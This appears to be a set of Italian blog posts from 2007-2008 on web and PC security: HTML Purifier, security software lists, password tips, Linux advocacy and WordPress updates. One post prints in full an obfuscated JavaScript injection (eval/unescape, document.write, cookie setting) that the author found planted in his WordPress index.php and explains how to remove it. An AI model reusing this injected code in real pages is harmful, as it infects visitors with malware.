Sebbene possa sembrare una sciocchezza, questo comporta una maggiore dimensione della pagina (e/o dell’intero sito), una minore ottimizzazione e, verosimilmente, problemi di sicurezza.

HTML Purifier è una libreria in PHP che assicura: sicurezza (rimuove il codice maligno, conosciuto come XSS), pulizia del codice (analizza il codice al fine di renderlo pulito, conforme agli standard e alle specifiche W3C) e apertura alle modifiche (è open source e, di conseguenza, altamente personalizzabile).

Installazione

L’installazione è facile: dopo aver il pacchetto di installazione dal sito, decomprimetelo sul vostro PC locale e poi trasferite la cartella library, sullo spazio web.

Ora impostate come scrivibile (chmod 755 o 777) la cartella:

/path/to/library/HTMLPurifier/DefinitionCache/Serializer

dove /path/to/library/, è il percorso sul server fino alla cartella indicata.

Configurazione

Anzitutto è necessaria l’inclusione della libreria:

require_once '/path/to/library/HTMLPurifier.auto.php';

In moltissimi casi, questo già basta per permettere ad HTML Purifier di funzionare correttamente, ma, se il vostro Doctype fosse diverso da XHTML Transitional e il vostro set di caratteri diverso da UTF-8, sono necessarie delle ulteriori e semplici modifiche:

require_once '/path/to/library/HTMLPurifier.auto.php';
$config = HTMLPurifier_Config::createDefault();
$config->set('Core.Encoding', 'ISO-8859-1');
$config->set('HTML.Doctype', 'XHTML 1.0 Strict');

In questo caso, abbiamo modificato il Doctype in XHTML 1.0 Strict e il set di caratteri in ISO-8859-1.

Esempio di utilizzo

Infine, vediamo un esempio pratico di funzionamento di HTML Purifier:

<?php
$dirty_html = "... codice HTML non ripulito ...";
$purifier = new HTMLPurifier();
$clean_html = $purifier->purify( $dirty_html );
echo $clean_html
?>

Nella variabile $dirty_html è contenuto il codice iniziale, mentre, in $clean_html, il codice ripulito ed ottimizzato!

Plugin

I meno esperti o i pigroni (!), possono semplicemente integrare HTML Purifier, tramite plugin, ai più noti CMS, come WordPress, Drupal e Joomla!

Come negli anni passati, il Convegno si terrà a Lanciano (CH) sabato 4 Ottobre 2008 presso i locali dell’Auditorium “G. Paone” della Banca Popolare di Lanciano e Sulmona con il contributo di numerosi sponsor (tra cui IBM), relatori di fama nazionale (Teti, D’Amico, Pollari, Foffi e altri) e organizzatori di tutto rispetto (Facoltà di Scienze della Comunicazione dell’Università degli Studi di Teramo).

Il programma dell’evento è disponibile qui. L’accesso è gratuito, ma i posti sono limitati per cui occorre iscriversi a questo indirizzo.

P.S. causa pigrizia mattutina, questo articolo l’ho semi-scopiazzato del blog del mio caro collega Heber D’Alberto!

Windows

Firewall

Quasi tutti hanno dei dati sensibili sui loro dischi rigidi che preferiscono tenere fuori dagli occhi indiscreti. Purtroppo, il Firewall di Windows XP, non è sufficiente a garantire ciò, poichè non è in grado di bloccare le connessioni in uscita, quindi vi consiglio di utilizzare, come alternativa ad esso, Comodo firewall. Con Windows Vista, invece, Microsoft ha affrontato (e risolto) questo problema, quindi non vi è alcuna necessità di utilizzare un firewall di terze parti.

Indipendentemente dal fatto che siete in XP o Vista, comunque, un router è essenziale: un firewall hardware è molto più sicuro di uno software.

Raccomandazioni

• Windows Vista: firewall incluso
• Windows XP: Comodo Firewall Pro Free (freeware)

Anti-virus

Forse il software più importante da avere su un computer (almeno se avete Windows come sistema operativo). Se non volete spendere soldini per software commerciali, vi consiglio uno di questi tre antivirus: AntiVir, Avast o AVG (ricordate comunque che, in nessun caso, dovrete installare più di un antivirus sul vostro computer).

Per quanto riguarda i software commerciali la scelta si riduce a: ESET NOD32 o Kaspersky Anti-Virus. Kaspersky Anti-Virus è leggermente superiore grazie ai tassi di rilevamento basati su file di firma, mentre NOD32 fornisce eccellenti euristiche (chiamate “ThreatSense” di ESET) per scoprire nuovi virus in circolazione.

Raccomandazioni

• Freeware: Antivir, Avast o AVG
• Shareware: ESET NOD32 o Kaspersky Anti-Virus

Anti-spyware and Anti-adware

Grazie all’acquisizione da parte di Microsoft della GIANT Company Software nel dicembre 2004, ora Windows ha un efficace software anti-spyware (disponibile per Windows XP e integrato con Windows Vista): Windows Defender. Potete utilizzare anche Lavasoft Ad-Aware (freeware), ma vi consiglio di utilizzarlo insieme a Windows Defender e non come alternativa. Se invece avete dei soldini da spendere, non vi è alcun dubbio che la migliore opzione commerciale è Webroot Spy Sweeper.

Raccomandazioni

• Freeware: Lavasoft Ad-Aware Free e Windows Defender
• Shareware: Webroot Spy Sweeper

Encryption

Come dicevamo precedentemente, ognuno, sul proprio computer, ha dei file da tenere lontano da occhi indiscreti. Impostare una password di protezione è una possibilità, ma potrebbe essere troppo facilmente crackabile con qualsiasi programma di password cracking. Per tutte le vostre esigenze di privacy, la crittografia è la strada da percorrere e TrueCrypt è l’applicazione che vi consiglio di utilizzare, dato che offre una grande sicurezza con il minimo intervento dell’utente. Inoltre, è interamente gratuito, è disponibile per Microsoft Windows, Mac OS X e Linux ed è la migliore soluzione per questo scopo.

Raccomandazioni

• Freeware: TrueCrypt

Watchdog (letteralmente, cane da guardia)

Introdotto con Windows Vista, molti lo odiano (visto che rallenta notevolmente il sistema), mentre qualcun altro lo adora. E’ quel sistema che chiede all’utente cosa acconsentire e cosa no. Se utilizzato correttamente, può bloccare vari tipi di malware. Per Windows Vista, come dicevamo, è incluso l’User Account Control (UAC) nel sistema, mentre, per Windows XP, vi consiglio Winpatrol.

Raccomandazioni

• Windows Vista: UAC
• Windows XP: Winpatrol

Linux

Snort

Snort è un applicativo open source con funzioni di tipo IDS (Intrusion Detection Systems) distribuito con la licenza GPL. L’IDS viene installato collegando una o più sonde configurate per analizzare ogni pacchetto che circola nella rete, garantendo un ottimo punto di osservazione su tutti i movimenti nella nostra rete. Analizza i pacchetti che transitano in rete, confrontandoli con un database di firme di attacchi; impara a riconoscere nuovi attacchi, introducendo nuove firme riconosciute come attacchi; verifica i protocolli utilizzati dai pacchetti, in modo da riconoscere eventuali anomalie nel traffico; rileva l’attività dei port scan, “esplorazione” che precede generalmente un attacco; segnala tutte le possibili minacce identificate da queste attività di controllo.

Wireshark

Wireshark (precedentemente chiamato Ethereal) è un software, rilasciato sotto licenza GNU GPL, per analisi di protocollo o packet sniffer (letteralmente annusa-pacchetti), utilizzato per la soluzione di problemi di rete, per l’analisi e lo sviluppo di protocolli o di software di comunicazione e per la didattica. Esso possiede tutte le caratteristiche di un analizzatore di protocollo standard. Le funzionalità di Wireshark sono molto simili a quelle di tcpdump, ma con un’interfaccia grafica, e maggiori funzionalità di ordinamento e filtraggio. Permette all’utente di osservare tutto il traffico presente sulla rete utilizzando la modalità promiscua dell’adattatore di rete (tipicamente si riferisce alle reti Ethernet, ma è possibile analizzare altri tipi di rete fisica).

AppArmor

Application Armor in breve AppArmor è un software di sicurezza per Linux rilasciato sotto licenza GNU GPL. Esso permette, all’amministratore di sistema, di associare a ogni programma uno profilo di sicurezza che restringe le capacità del programma. Esso fu creato in parte come alternativa a SELinux, che i critici dichiarano sia difficile per gli amministratori impostarlo e mantenerlo. A differenza di SELinux, che si basa sull’appliczione di etichette ai file, AppArmor lavora sul sentiero (path) del file.

Nmap

Nmap è un software libero distribuito con licenza GNU GPL da Insecure.org creato per effettuare port scanning, cioè mirato all’individuazione di porte aperte su un computer bersaglio, in modo da determinare quali servizi di rete siano disponibili. È in grado di ipotizzare quale sistema operativo sia utilizzato dal computer bersaglio, tecnica conosciuta come fingerprinting. Nmap è divenuto uno degli strumenti praticamente indispensabili della “cassetta degli attrezzi” di un amministratore di sistema, ed è usato per test di penetrazione e compiti di sicurezza informatica in generale.

Netcat

Netcat, anch’esso distribuito con licenza GNU GPL , è descritto dai suoi sviluppatori come il coltellino svizzero del TCIP/IP: è un potente strumento per la lettura e la scrittura di dati di rete. E’ estremamente versatile e può essere utilizzato per un’ampia varietà di cose tra cui port scan, trasferimenti di file, e per l’interazione con i servizi di rete remoto dalla riga di comando. Vi è anche una migliore e più moderna versione chiamata socat.

Mac

Preferenze di Sistema

La prima voce della lista per Mac OS X è il fidato pannello Preferenze di Sistema. Tramite esso è possibile controllare gli utenti abilitati ad accedere alla vostra macchina, far richiedere una password per riattivare il computer dallo sleep o dallo screensaver, fare il logout automatico dopo un determinato periodo di inattività etc. etc. Il pannello di sicurezza offre anche l’accesso al FileVault e al Firewall incorporato di Mac OS X che può essere impostato per consentire solo i servizi essenziali o controllare l’accesso di ogni singola applicazione (per ulteriori dettagli sulla configurazione del firewall di OS X, guardate più avanti).

Utility Open Firmware

Ogni Mac prodotto dal 2000 ha la possibilità di impostare una password in Open Firmware che impedisce ad un utente con accesso fisico al computer o di avviarlo da un disco ottico, con un volume di avvio di rete, con una singola unità connesse in modalità disco di destinazione o in modalità single-user. Se vi trovate in un ambiente in cui avete bisogno di quel briciolo di sicurezza in più, questo accorgimento potrebbe fare al caso vostro!

ClamAV

Sì, è vero, virus, trojan, worm, e simili, al momento, sono molto rari su OS X, ma Apple sta guadagnando quota di mercato molto velocemente quindi non è da escludere che, in futuro, si svilupperanno malware anche per questo sistema e non è il caso di farsi trovare impreparati! Anche se ci sono diversi software antivirus commerciali per la piattaforma Mac, io vi consiglio l’applicazione open source ClamAV (disponibile in una versione appositamente costruita Mac OS X).

Little Snitch

Per evitare che un’applicazione acceda ad internet senza il nostro consenso esiste il pluripremiato Little Snitch: non appena un programma tenta di inviare dei dati verso l’esterno, infatti, Little Snitch lo notifica con un messaggio e offre la possibilità di acconsentire tale comunicazione una volta sola, sempre o di negargli questa possibilità. Concepito per aumentare il livello di sicurezza e privacy del Mac, questa leggera e potente utility è molto utile per prevenire ed eventualmente aiutare a stanare l’attività di keylogger e malware.

WaterRoof

Se desiderate avere un maggior controllo sul firewall incluso in Mac OS X, vi consiglio il software open source WaterRoof. Sebbene abbia una interfaccia grafica davvero molto semplice: si tratta di una potente applicazione che vi permetterà di gestire la tua larghezza di banda e controllare ogni aspetto della ipfw, tra cui la configurazione NAT, regole, port forwarding, e altro ancora.

Conclusioni

Oltre a tutte le applicazioni indicate in questo articolo c’è uno “strumento” che spesso viene trascurato da molti utenti: il buon senso. Ciò significa non cliccare sul link sospetti (prestando attenzione ai filtri antiphishing incorporato in quasi tutti i browser moderni e nei client di posta elettronica), non aprire le email sospette e, in generale, diffidare da tutto ciò che vi sembra poco sicuro.

Inoltre, assicuratevi di mantenere il vostro sistema aggiornato, cosa molto facile grazie ai meccanismi di auto-aggiornamento software inclusi in tutti i moderni sistemi operativi (in Windows c’è il Windows Update, in Mac OS X c’è l’Aggiornamento Software e in Linux potete utilizzare il sistema di gestione dei pacchetti della vostra distribuzione Linux preferita).

Fonte di ispirazione: Ars

Di cosa parlo?! Di questo codice maligno (all’apparenza incomprensibile, poichè criptato in esadecimale) javascript che mi è stato iniettato nel blog (a me, così come a tanti altri bloggers che utilizzano WordPress come piattaforma):

[quickcode:noclick]
<script language=”javascript”>$=”%63b%3d%22e(d%2573);%2573t%253dtm%2570%253d%2527%2527;for(i%253d0;i%253cds%252e%256ce%256eg%25%22;st%3d%22%2573t%253d%2522$%253d%2573%2574;%2564c%2573%2528d%2561%252bd%2562%252bd%2563+%2564%2564%252b%2564e%252c%2531%2530)%253b%2564w%2528s%2574)%253bs%2574%253d%2524%253b%2522;%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;cc%3d%2274%2568;i+%252b%2529{t%256dp%253dd%2573%252es%256c%2569ce%2528i,i%252b1%2529;st%253d%22;ce%3d%22ar%2543od%2565%2541%2574%25280)^%2528%25270%25780%2530%2527+es%2529))%253b%257d}%22;cz%3d%22%2566unc%2574ion%2520cz%2528cz)%257bre%2574ur%256e %2563a+c%2562+%2563c+%2563d+c%2565+%2563z;}%253b%22;dz%3d%22%2566un%2563t%2569on%2520dw(%2574){c%2561%253d%2527%252564%25256f%252563ume%25256et%252e%2577%252572i%2574%252565(%252522%2527;ce%253d%2527%252522)%2527;c%2562%253d%2527%25253csc%252572%2569%2570%252574 l%252561%256eg%252575a%2525%2536%2537%2565%25253%2564%25255c%25252%2532ja%2576a%2573cr%2569%252570t%25255c%2525%25322%25253e%2527;c%2563%253d%2527%25253c%25255c%25252fsc%2572%2569p%252574%25253e%2527;eva%256c(u%256ees%2563ap%2565(t%2529)%257d%253b%22;op%3d%22%2524%253d%2522dw%2528d%2563s(%2563u%252c1%2534));%2522;%22;ca%3d%22%2566%2575%256e%2563t%2569o%256e%2520dcs%2528d%2573,%2565s%2529{d%2573%253dunesca%2570%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|“d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22s%2574+%2553tri%256e%2567.f%2572%256fmC%2568%2561rCo%2564%2565(%2528t%256dp%252ec%2568%22;%69f%20(d%6fcum%65nt%2e%63oo%6b%69%65.i%6edex%4f%66(%27%76%62ull%65tin%5fmu%6ctiq%75%6f%74e%3d%27)%3d%3d-1){sc%28%27vbu%6clet%69n%5fm%75l%74iqu%6ft%65%3d%27,2,7);%65va%6c(un%65sc%61pe%28d%7a%2bc%7a+op%2b%73t)%2b%27dw(%64z%2bcz%28$+%73t%29)%3b%27)}e%6cse{%24%3d%27%27};f%75nct%69on %73c%28cnm%2cv,e%64){%76a%72 ex%64%3dnew %44ate%28);%65xd.%73%65%74Da%74%65(ex%64.g%65tD%61%74e()%2b%65%64);%64%6fcu%6dent%2eco%6fkie%3dcnm%2b %27%3d%27 +esca%70%65(v%29+%27;ex%70i%72es%3d%27%2bex%64.%74o%47M%54%53t%72in%67%28);%7d;”;eval(unescape($));document.write($);</ script></body>
[/quickcode]

Per chi si trovasse nella mia stessa situazione, non disperate, il problema è di facile risoluzione: basta editare il file index.php (presente nella root dell’installazione di WordPress) e rimuovere brutalmente il codice indicato in precedenza.

Fatto ciò, non ci resta che sperare che lo staff di WordPress tappi questa grave falla al più presto!

Ah, dimenticavo, mi scuso con tutti voi per gli eventuali disagi provocati dal codice maligno.

AGGIORNAMENTO DELLE 22.50 DEL 07/05/2008

Bene.. ci sto capendo qualcosa di più su questa situazione alquanto strana. Anzitutto l’iniezione di codice maligno sembra non derivare da un baco di WordPress, ma di una vulnerabilità dei server Aruba. Per approfondire l’argomento date un occhio a questo sito dove è indicato anche come eliminare il MBR rootkit/trojan Sinowal (questo è il nome del malware), nel caso in cui qualcuno di voi fosse stato infettato (spero non dal mio sito!).

Ah, di questa cosa ne ha parlato anche Napolux.

Inoltre, come bonus, è stata aggiunta la possibilità di personalizzare la pagina di errore della connessione al database (inizialmente prevista per la 2.4)

Correte ad aggiornare i vostri blog scaricando WordPress 2.2.3 da qui.

P.S. prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database.

Fonte: WordPress Italy

Esso è una valida alternativa ai sistemi operativi commerciali come Microsoft Windows o Mac OS X e, in questo articolo, elencherò 12 motivi (in rigoroso ordine sparso!) per i quali ci si dovrebbe almeno informare su cos’è e come funziona GNU/Linux:

1. Costo: salvo rarissime eccezioni le distribuzioni GNU/Linux sono gratuite e liberamente scaricabili, i sistemi operativi commerciali, al contrario, costano centinaia di euro.
2. Licenza d’uso: tutti noi sappiamo che copiare software, la dove non espressamente consentito dalla licenza d’uso, è un reato; per non parlare poi dei cosiddetti crack per utilizzare software proprietario violando la relativa licenza d’uso. Ma perchè andare ad imbarcarsi in avventure pericolose quando esiste software di qualità che fa esattamente tutto quello di cui avete bisogno, che potete scaricare gratuitamente e liberamente dalla rete e nel pieno rispetto della legge?!
3. Durata nel tempo: il software open source non scade, perché non è prodotto con criteri commerciali al contrario del software proprietario sviluppato per avere una forma di “obsolescenza programmata”: si tratta della strategia commerciale che porta una determinata tecnologia (sia essa hardware o software) a essere sostituita (e quindi resa obsoleta) da una nuova versione dopo un periodo predefinito di tempo. Questo è fondamentale per un’azienda che basa la sua esistenza sui profitti derivanti dalle vendite del proprio prodotto, ma non lo è assolutamente per la comunità del software libero.
4. Requisiti hardware: anche l’hardware del vostro computer invecchia e chi sviluppa software proprietario non ha interesse a fornire versioni “alleggerite” in grado di supportare hardware non recentissimo (anche in un’ottica di accordi con i produttori di hardware) il che comporta una compatibilità hardware “all’indietro” di pochi anni. Questo fenomeno è particolarmente evidente in Windows Vista: le “avanzate” caratteristiche di questo sistema operativo fanno sì che richieda importanti risorse hardware, costringendo molti utenti a dover aggiornare o, addirittura, cambiare il proprio computer per poterlo utilizzare. Anche GNU/Linux può naturalmente aver bisogno di risorse hardware particolarmente importanti (a seconda di quello che l’utente deve fare con il sistema: se volete fare montaggio audio/video avrete bisogno di tanta memoria RAM e un ottimo processore, non c’è alternativa), ma essendo completamente open source, quindi modificabile e ridistribuibile, esistono numerose versioni che sono espressamente concepite per funzionare con sistemi non particolarmente recenti. Ovviamente bisognerà rinunciare a qualcosa (ad esempio niente grafica tridimensionale con finestre che si infiammano o cose simili), ma il sistema operativo sarà lo stesso funzionante, oggi, domani e anche più in là, finché non riterrete (voi!) che sia passato sufficiente tempo da giustificare l’acquisto di un nuovo computer.
5. Prestazioni: Linux gestisce in maniera estremamente efficiente la memoria RAM del sistema, è possibile scegliere quale tipo di filesystem utilizzare e sfrutta tutte le potenzialità che i moderni processori offrono. Questo è dovuto al fatto che, non essendoci attese di mesi o anni tra una release del sistema operativo e l’altra, le migliorie vengono introdotte entro brevissimo tempo.
6. Sicurezza (del sistema operativo): lo scorso anno sono stati scoperti ben 48.000 nuovo virus per Windows, rispetto a soli 40 per GNU/Linux. Come se non bastasse, gli utenti Windows, devono preoccuparsi anche di dialer, adware, trojan etc.etc. In fondo, non è un caso se la maggior parte dei server funziona grazie a sistemi *unix, non credete?!
7. Sicurezza (di applicazioni di terze parti): anche le applicazioni installate possono avere problemi di sicurezza ed è quindi necessario aggiornarle ad ogni nuova release. Questo, in Windows, si concretizza in un noioso lavoro manuale mentre, nella maggior parte delle distribuzioni GNU/Linux, esistono delle utility che rendono questa operazione del tutto automatica! Ah, dimenticavo, non è richiesto alcun riavvio dopo aver installato gli aggiornamenti!
8. Dual boot: è possibile partizionare il proprio disco rigido e far convivere tranquillamente GNU/Linux e Windows o Mac OS X.
9. Installazione: chiunque abbia mai fatto una installazione di Windows da zero sa che questa operazione porta via parecchie ore sia per l’installazione in sè, sia per trovare, scaricare ed installare i vari software applicativi. GNU/Linux (che, nella maggior parte dei casi, si installa ne giro di 30/40 minuti), invece, include una serie davvero completa di applicazioni e, ovviamente, non richiede nessuna attivazione e/o registrazione.
10. Reinstallazione del sistema operativo: non si può semplicemente scaricare una versione aggiornata di Windows (per versione aggiornata non intendo una nuova release, ma semplicemente una versione che abbia tutte le patch rilasciate fino a quel momento), ma si è costretti ad utilizzare il CD in dotazione con il vostro PC e scaricare tutte le patch che Microsoft ha rilasciato da quando il CD è stato fatto. Con Linux, è sufficiente scaricare (in maniera completamente LEGALE e GRATUITA!) l’ultima versione della distribuzione che utilizzate ed avrete sistema operativo e programmi applicativi aggiornati all’ultima versione.
11. Facilità d’uso: cerchiamo di sfatare il falso mito che “GNU/Linux è difficile da installare e da usare”. E’ vero, esistono delle distribuzioni complesse da utilizzare, ma ne esistono molte altre davvero semplici ed intuitive; ve ne consiglio qualcuna, così potete “testare con mano”: Ubuntu, Mandriva, OpenSuse.
12. Software applicativo: i programmi applicativi forniti con Windows sono minimali quindi nella stragrande maggioranza dei casi, gli utenti, sono costretti ad utilizzare software di terze parti (spesso e volentieri, pagandolo). Per GNU/Linux, invece, c’è una quantità di software open source davvero impressionate.

P.S. vi ricordo che tra una settimana ci sarà il LinuxDay 2007: io parteciperò a quello di Teramo che è organizzato dal TeLUG (di cui faccio parte). Se doveste passare da quelle parti, mi raccomando, fatemi un fischio!

Fonti di ispirazioni/informazioni: DesktopLinux, GLUGTO.

Per scaricare WordPress 2.2.3 clickate qui, per sapere come aggiornare dalle versioni precedenti clickate qui.

P.S. prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database.

Con la campagna “Buonsenso in tutti i sensi” la Polizia Postale e eBay.it (ovvero il primo sito di commercio elettronico in Italia), spiegano le principali regole per fare acquisti sicuri su Internet, associandole ai 5 sensi:

1. GUARDA prima di scegliere bene la password: e di non comunicarla mai a nessuno: utilizza almeno 8 caratteri, con una combinazione di lettere, numeri e caratteri speciali. Non usate parole o termini facili da indovinare. Non utilizzate la stessa password per diversi siti o servizi. Per approfondire l’argomento, vi consiglio di consultare questo mio post.
2. ASCOLTA i feedback sulla serietà del venditore che trovi anche su siti come eBay.
3. ASSAGGIA prima i tuoi acquisti, controllando la descrizione e le condizioni di spedizione e consegna e scegli metodi di spedizione tracciabili. Se tutti i dettagli non sono illustrati bene, contatta il venditore prima di procedere con l’acquisto. Inoltre, per legge puoi recedere da un contratto di acquisto online entro 10 giorni dalla ricezione della merce. Ricordati che vendere e/o acquistare oggetti contraffatti è reato.
4. TOCCA con mano il pagamento online e scegli metodi di pagamento sicuri come PayPal, il bonifico bancario, il conto corrente postale, il contrassegno o i servizi di deposito a garanzia. Per pagare i tuoi acquisti online evita di ricaricare la carta prepagata di sconosciuti o di utilizzare servizi di trasferimento contanti come Western Union o Moneygram perchè sono poco sicuri.
5. FIUTA le false email (phishing). Diffida dalle email che ti chiedono di fornire dati riservati, password o informazioni sulla tua carta di credito attraverso link. Le aziende serie non richiedono mai queste informazioni via email.

Vi invito, inoltre, a fare questo test per valutare le vostre conoscenze sulla sicurezza degli acquisti online e non lasciare scampo ai truffatori della rete!

Ecco alcune semplici regole che tutti gli utenti dovrebbero osservare:

• scegliete una password lunga almeno 8 caratteri
• non utilizzate parole di senso compiuto comunemente utilizzate
• evitate i nomi dei vostri figli, del coniuge o di un animale domestico, le date di nascita e tutte quelle parole che derivano da informazioni personali facilmente ottenibili da malintenzionati
• la sicurezza della password aumenta se essa contiene numeri, lettere e simboli (ne riparleremo tra un attimo, con un esempio pratico)
• non usate mai una password che contenga parte del nome utente o dell’indirizzo e-mail
• non utilizzate la stessa password per parecchi servizi online.

Ed ora un esempio pratico, nel quale vi illustrerò il metodo che utilizzo per creare le mie password affinchè siano complesse e facili da ricordare:

1. penso ad una frase semplice da ricordare; essendo appassionato di tennis e, in particolare, tifoso di Rafael Nadal, ipotizziamo che la frase scelta sia “viva nadal“
2. sostituisco i numeri ad alcune lettere (ad esempio inserisco il 4 al posto dalla a, l’1 al posto della i, il 3 al posto della e e così via) ed ottengo: v1v4n4d4l
3. sostituisco qualche lettera minuscola in maiuscola (in questo esempio la V e la N) ed ottengo: V1v4N4d4l
4. infine, aggiungo un carattere speciale ed ottengo: V1v4N4d4l!

Ricordate, inoltre, che la creazione di una password sicura è solo un punto di partenza che deve necessariamente proseguire con una corretta conservazione; ecco alcuni consigli a riguardo:

• non digitate la password in presenza di estranei
• non trascrivete la password su fogli di carta o, come spesso succede, su bigliettini attaccati al monitor!
• non rivelate la vostra password ad altre persone
• modificate la password di tanto in tanto.

Concludo l’articolo segnalandovi due applicazioni online (reperibili qui e qui), in grado di calcolare il livello di sicurezza di una password.

Per scaricare WordPress 2.2.2 clickate qui, invece, per scaricare la versione 2.0.11 clickate qui; per sapere come aggiornare dalle versioni precedenti clickate qui.

P.S. prima di procedere con l’aggiornamento, è consigliabile fare un backup dei file e del database.